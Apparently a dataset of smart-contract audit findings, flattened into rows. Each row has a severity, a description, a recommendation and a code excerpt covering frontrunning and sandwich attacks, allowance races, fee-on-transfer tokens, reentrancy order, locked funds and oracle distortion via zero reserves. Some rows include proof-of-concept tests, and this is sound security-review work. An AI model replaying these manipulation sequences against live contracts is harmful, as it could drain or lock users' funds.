Consider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle,) = // Remove the line below\\n LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods // Remove the line below\\n s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical as excess Bean minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. If no one attempts the attack, the behavior will remain as originally intended.\\n\\clearpage
Attempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.
```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n
Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intended
low
When updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. `PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n "Silo: decreased allowance below zero"\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.
Set the allowance to zero if the intended subtracted value exceeds the current allowance.\\n\\clearpage
Requiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, their loss of funds due to a different route to the same approval front-running attack vector.
```\\nrequire(\\n currentAllowance >= subtractedValue,\\n "Silo: decreased allowance below zero"\\n);\\n```\\n
Non-standard ERC20 tokens are not supported
medium
The protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L49, we can see that the protocol assumes `amount` of tokens were transferred. But this does not hold true for some non-standard ERC20 tokens like fee-on-transfer tokens or rebalancing tokens. (Refer to here about the non-standard weird ERC20 tokens)\\nFor example, if token incurs fee on transfer, the actually transferred `amount` will be less than the provided parameter `amount` and the `deposits` will have a wrong state value. Because the current implementation only allows full withdrawal, this means the tokens will be locked in the contract permanently.
We recommend adding another field in the `Deposit` structure, say `balance`\\nWe recommend allow users to withdraw partially and decrease the `balance` field appropriately for successful withdrawals. If these changes are going to be made, we note that there are other parts that need changes. For example, the withdraw function would need to be updated so that it does not require the withdrawal amount is same to the original deposit amount.
If non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.
```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n
The deposit function is not following CEI pattern
low
The protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L47, we can see that the token transfer happens before updating the accounting state of the protocol against the CEI pattern. Because the protocol intends to support all ERC20 tokens, the tokens with hooks (e.g. ERC777) can be exploited for reentrancy. Although we can not verify an exploit that causes explicit loss due to this, it is still highly recommended to follow CEI pattern to prevent possible reentrancy attack.
Handle token transfers after updating the `deposits` state.
null
```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n
Nonstandard usage of nonce
low
The protocol implemented two withdraw functions `withdrawDeposit()` and `withdraw()`. While the function `withdrawDeposit()` is designed to be used by the depositor themselves, the function `withdraw()` is designed to be used by anyone who has a signature from the depositor. The function `withdraw()` has a parameter `nonce` but the usage of this param is not aligned with the general meaning of `nonce`.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, `nonce` is used to track the latest transaction from the EOA and generally it is increased on the user's transaction. It can be effectively used to invalidate the previous signature by the signer. But looking at the current implementation, the parameter `nonce` is merely used as an index to refer the `deposit` at a specific index.\\nThis is a bad naming and can confuse the users.
If the protocol intended to provide a kind of invalidation mechanism using the nonce, there should be a separate mapping that stores the nonce for each user. The current nonce can be used to generate a signature and a depositor should be able to increase the nonce to invalidate the previous signatures. Also the nonce would need to be increased on every successful call to `withdraw()` to prevent replay attack. Please note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely because the hash will be always decided using the latest nonce and the nonce will be invalidated automatically (because it increases on successful call).\\nIf this is not what the protocol intended, the parameter nonce can be renamed to `depositIndex` as implemented in the function `withdrawDeposit()`.
null
```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
Unnecessary parameter amount in withdraw function
low
The function `withdraw()` has a parameter `amount` but we don't understand the necessity of this parameter. At line L67, the `amount` is required to be the same to the whole deposit `amount`. This means the user does not have a flexibility to choose the withdraw `amount`, after all it means the parameter was not necessary at all.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
If the protocol intends to only allow full withdrawal, this parameter can be removed completely (that will help save gas as well). Unnecessary parameters increase the complexity of the function and more error prone.
null
```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
Functions not used internally could be marked external
low
Using proper visibility modifiers is a good practice to prevent unintended access to functions. Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n
Consider change the visibility modifier to `external` for the functions that are not used internally.
null
```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n
User's funds are locked temporarily in the PriorityPool contract
medium
The protocol intended to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()` where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? _amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nBut looking in the function `_withdraw()`, only `toWithdrawFromPool` amount of LSD tokens are withdrawn (burn) from the staking pool and `toWithdrawFromQueue` amount of LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users by the mapping `accountQueuedTokens` and this leads to possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees his queued amount (getQueuedTokens()) is positive. Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through the communication with the protocol team, it is understood that `updateDistribution` is expected to be called probably every 1-2 days unless there were any new deposits into the staking pool. So it means user's funds can be locked temporarily in the contract which is unfair for the user.
Consider add a feature to allow users to withdraw LSD tokens from the contract directly.
User's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\n
```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n
Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0
high
The current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. Given that `GeoEmaAndCumSmaPump` restricts values to a minimum of 1 to prevent issues with the geometric mean, that the TWA values are not truly representative of the reserves in the `Well`, we believe it is worse than reverting in this case, although a `ConstantProduct2` `Well` can have zero reserves for either token via valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\n
Revert the pump updates if they are called with zero reserve values.
Updating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to be zero through valid transactions and updating pumps do not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swaFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\n
```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n
`LibLastReserveBytes::storeLastReserves` has no check for reserves being too large
medium
After every liquidity event & swap, the IPump::update()is called. To update the pump, theLibLastReserveBytes::storeLastReservesfunction is used. This packs the reserve data intobytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds to 22 bytes total, but the function also attempts to pack the second reserve balance in the `bytes32` object. This would mean the `bytes32` would need 38 bytes total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of the reserve balances using shift, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the amount being stored is too large, the actual stored value will be different than what was expected to be stored.\\nOn the other hand, the `LibBytes.sol` does seem to have a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, "ByteStorage: too large");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well. So in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well that is implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.
We recommend adding a check on the size of reserves in `LibLastReseveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReseveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.
While we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\n
```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n